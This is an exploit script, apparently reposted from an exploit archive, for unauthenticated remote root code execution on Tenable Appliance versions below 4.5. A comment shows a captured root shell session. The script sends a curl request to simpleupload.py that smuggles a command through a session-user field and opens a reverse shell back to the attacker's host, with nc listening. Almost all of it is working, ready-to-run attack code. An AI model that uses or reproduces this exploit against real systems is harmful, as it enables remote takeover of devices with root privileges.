Tenable Appliance < 4.5 - Unauthenticated Remote Root Code Execution
来源:vfocus.net 作者:agix 发布时间:2017-04-19
#!/bin/bash : ' According to http://static.tenable.com/prod_docs/upgrade_appliance.html they fixed two security vulnerabilities in the web interface in release 4.5 so I guess previous version are also vulnerable. # Exploit Title: Unauthenticated remote root code execution on Tenable Appliance # Date: 18/04/17 # Exploit Author: agix # Vendor Homepage: https://www.tenable.com/ # Version: < 4.5 # Tested on: Tenable Appliance 3.5 tenable $ ./rce.sh bash: no job control in this shell bash-3.2# ls app appliancelicense.html appliancelicense.pdf appliancelicense.txt images includes index.ara js lcelicense.html lcelicense.pdf lcelicense.txt migrate nessuslicense.html nessuslicense.pdf nessuslicense.txt password.ara pvslicense.html pvslicense.pdf pvslicense.txt sclicense.html sclicense.pdf sclicense.txt simpleupload.py static bash-3.2# id uid=0(root) gid=0(root) bash-3.2# ' #!/bin/bash TENABLE_IP="" YOUR_IP="" LISTEN_PORT=31337 curl -k "https://$TENABLE_IP:8000/simpleupload.py" --data $'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"\'%0abash -i >%26 /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '& nc -l -p $LISTEN_PORT
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